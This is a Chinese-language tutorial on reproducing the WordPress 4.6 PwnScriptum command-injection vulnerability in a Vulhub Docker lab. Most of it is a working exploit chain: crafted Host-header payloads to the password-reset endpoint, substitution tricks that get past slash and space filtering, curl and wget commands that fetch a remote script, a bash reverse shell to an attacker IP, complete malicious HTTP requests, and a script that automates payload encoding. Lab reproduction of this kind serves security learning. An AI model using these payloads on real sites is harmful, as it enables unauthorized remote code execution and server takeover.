WordPress 4.6老漏洞复现:用Docker+BurpSuite一步步拿Shell(附绕过字符限制技巧)
WordPress 4.6命令执行漏洞实战:从Docker环境搭建到Shell获取全解析
在网络安全领域,漏洞复现是提升实战能力的重要途径。今天我们将深入探讨WordPress 4.6版本中一个经典的命令执行漏洞(PwnScriptum),通过完整的实验流程,帮助安全爱好者理解漏洞原理并掌握实际利用技巧。不同于简单的漏洞复现教程,本文将重点解析漏洞利用过程中的关键限制及其绕过方法,让你不仅能复现漏洞,更能理解背后的技术细节。
1. 实验环境准备与漏洞背景
1.1 漏洞概述与影响范围
WordPress 4.6版本的PwnScriptum漏洞源于PHP Mailer组件(版本<5.2.18)的一个设计缺陷。该漏洞允许攻击者通过精心构造的HTTP请求头,在目标服务器上执行任意系统命令。值得注意的是,这个漏洞的利用需要满足以下条件:
- WordPress版本≤4.6.0
- PHP Mailer版本<5.2.18
- 知道至少一个有效的后台用户名
漏洞利用的核心原理在于攻击者可以控制Host头中的特定参数,通过邮件发送功能触发命令执行。这种类型的漏洞在Web应用中尤为危险,因为它可能绕过常规的输入过滤机制。
1.2 Docker环境搭建
为了安全地复现这个漏洞,我们使用Vulhub提供的Docker环境。以下是详细的环境搭建步骤:
- 首先确保系统已安装Docker和docker-compose
- 下载Vulhub漏洞环境库:
git clone https://github.com/vulhub/vulhub.git - 进入WordPress漏洞目录:
cd vulhub/wordpress/pwnscriptum - 启动漏洞环境:
docker-compose up -d
环境启动后,可以通过以下命令验证服务状态:
docker-compose ps正常情况下,你应该看到类似如下的输出:
Name Command State Ports -------------------------------------------------------------------------------- wordpress_db_1 docker-entrypoint.sh mysqld Up 3306/tcp wordpress_web_1 docker-php-entrypoint apac ... Up 0.0.0.0:8080->80/tcp提示:实验结束后,记得使用
docker-compose down命令清理环境,避免占用系统资源。
2. 漏洞利用的核心机制分析
2.1 漏洞触发点解析
该漏洞的触发点在于WordPress的密码重置功能。当用户请求密码重置时,系统会构造一封包含重置链接的邮件发送给用户。在这个过程中,PHP Mailer组件会处理邮件头信息,而Host头的特殊构造可以被利用来注入系统命令。
典型的漏洞利用数据包结构如下:
POST /wp-login.php?action=lostpassword HTTP/1.1 Host: target(any -froot@localhost -be ${run{要执行的命令}} null) User-Agent: Mozilla/5.0 Content-Type: application/x-www-form-urlencoded Content-Length: 56 wp-submit=Get+New+Password&redirect_to=&user_login=admin2.2 关键限制与绕过思路
这个漏洞在实际利用中存在几个重要限制,理解这些限制对成功复现至关重要:
字符限制:
- 斜杠(/)必须替换为
${substr{0}{1}{$spool_directory}} - 空格必须替换为
${substr{10}{1}{$tod_log}} - 不能使用引号和管道符
- 斜杠(/)必须替换为
大小写转换:
- 所有命令会被自动转换为小写
路径要求:
- 必须使用绝对路径,不能依赖环境变量
- 例如必须使用
/bin/bash而非简单的bash
用户名要求:
- 必须提供有效的后台用户名
无回显:
- 命令执行后不会在页面上显示输出
为了绕过这些限制,通常采用分阶段执行的策略:
- 先下载远程服务器上的恶意脚本
- 然后执行下载的脚本获取交互式shell
3. 实战漏洞利用:从命令执行到获取Shell
3.1 准备反弹Shell载荷
在开始漏洞利用前,我们需要准备两个关键组件:
- 恶意脚本:包含反弹Shell命令的shell脚本
- 监听服务:用于接收反弹Shell连接的Netcat监听器
首先创建一个名为shell.sh的脚本文件,内容如下:
#!/bin/bash bash -i >& /dev/tcp/攻击者IP/7777 0>&1然后启动Netcat监听器:
nc -lvnp 77773.2 构造有效载荷
我们需要执行两条关键命令:
- 下载恶意脚本:
/usr/bin/curl -o /tmp/rce 攻击者IP/shell.sh - 执行下载的脚本:
/bin/bash /tmp/rce
根据漏洞限制,我们需要对这些命令进行特殊处理:
| 原始命令 | 处理后格式 |
|---|---|
/ | ${substr{0}{1}{$spool_directory}} |
| 空格 | ${substr{10}{1}{$tod_log}} |
以第一条命令为例,转换过程如下:
- 原始命令:
/usr/bin/curl -o /tmp/rce 攻击者IP/shell.sh - 替换斜杠:
${substr{0}{1}{$spool_directory}}usr${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}curl -o ${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}rce 攻击者IP${substr{0}{1}{$spool_directory}}shell.sh - 替换空格:
${substr{0}{1}{$spool_directory}}usr${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}curl${substr{10}{1}{$tod_log}}-o${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}rce${substr{10}{1}{$tod_log}}攻击者IP${substr{0}{1}{$spool_directory}}shell.sh
3.3 使用BurpSuite发送恶意请求
以下是使用BurpSuite发送恶意请求的详细步骤:
拦截密码重置请求:
- 在浏览器中访问
http://目标IP:8080/wp-login.php?action=lostpassword - 输入已知的用户名(如admin)并点击"Get New Password"
- 使用BurpSuite拦截这个请求
- 在浏览器中访问
修改Host头:
- 将Host头替换为处理后的命令格式:
target(any -froot@localhost -be ${run{处理后的命令}} null)
- 将Host头替换为处理后的命令格式:
发送第一条命令(下载脚本):
POST /wp-login.php?action=lostpassword HTTP/1.1 Host: target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}usr${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}curl${substr{10}{1}{$tod_log}}-o${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}rce${substr{10}{1}{$tod_log}}攻击者IP${substr{0}{1}{$spool_directory}}shell.sh}} null)发送第二条命令(执行脚本):
POST /wp-login.php?action=lostpassword HTTP/1.1 Host: target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}bash${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}rce}} null)
成功执行后,你应该能在Netcat监听器中看到反弹Shell的连接。
4. 高级技巧与替代方案
4.1 命令构造的自动化处理
手动转换命令既繁琐又容易出错。我们可以使用简单的Shell脚本来自动化这个过程:
#!/bin/bash cmd="$1" # 替换斜杠 cmd=${cmd//\//'\${substr{0}{1}{\$spool_directory}}'} # 替换空格 cmd=${cmd// /'\${substr{10}{1}{\$tod_log}}'} echo "target(any -froot@localhost -be \${run{$cmd}} null)"使用方法:
./transform.sh "/usr/bin/curl -o /tmp/rce 攻击者IP/shell.sh"4.2 替代的利用方式
除了使用curl下载脚本外,还有其他几种常见的利用方式:
使用wget替代curl:
/usr/bin/wget -O /tmp/rce 攻击者IP/shell.sh直接执行命令(适用于简单操作):
/usr/bin/whoami写入文件直接执行:
echo 'bash -i >& /dev/tcp/攻击者IP/7777 0>&1' > /tmp/rce && /bin/bash /tmp/rce
4.3 常见问题排查
在漏洞复现过程中,可能会遇到以下问题及解决方案:
| 问题现象 | 可能原因 | 解决方案 |
|---|---|---|
| 命令未执行 | 用户名不正确 | 确保使用有效的后台用户名 |
| 无反弹Shell连接 | 网络问题或命令错误 | 检查监听器设置和命令转换是否正确 |
| Docker环境无法启动 | 端口冲突 | 修改docker-compose.yml中的端口映射 |
| 脚本下载失败 | 路径或权限问题 | 确保web服务器可访问且脚本路径正确 |
注意:在实际渗透测试中,务必确保已获得目标系统的授权。未经授权的测试可能违反法律。